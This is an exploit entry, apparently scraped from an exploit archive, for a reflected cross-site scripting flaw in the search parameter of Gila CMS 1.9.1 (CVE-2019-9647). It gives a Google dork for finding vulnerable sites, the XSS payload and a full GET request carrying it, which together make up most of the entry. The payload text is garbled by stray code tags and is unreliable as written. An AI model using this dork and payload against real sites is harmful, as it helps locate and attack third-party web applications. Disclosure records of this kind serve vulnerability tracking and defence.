扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
# Exploit Title: Gila CMS (search) Cross Site Scripting # Google Dork: intext:"Powered By Gila CMS" # Date: 11.03.2019 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://gilacms.com # Software Link: https://gilacms.com/packages/downloadRelease/1.9.1.zip # Demo Site: https://gilacms.com/demo/ # Version: 1.9.1 # Tested on: Kali Linux # CVE: CVE-2019-9647 # Vulnerable Parameter: search # Payload: <--<code><img/src=</code> onerror=confirm<code></code>> --!> # GET Request: http://localhost/?search=<--<code><img/src=</code> onerror=confirm<code></code>> --!> |
体验盒子
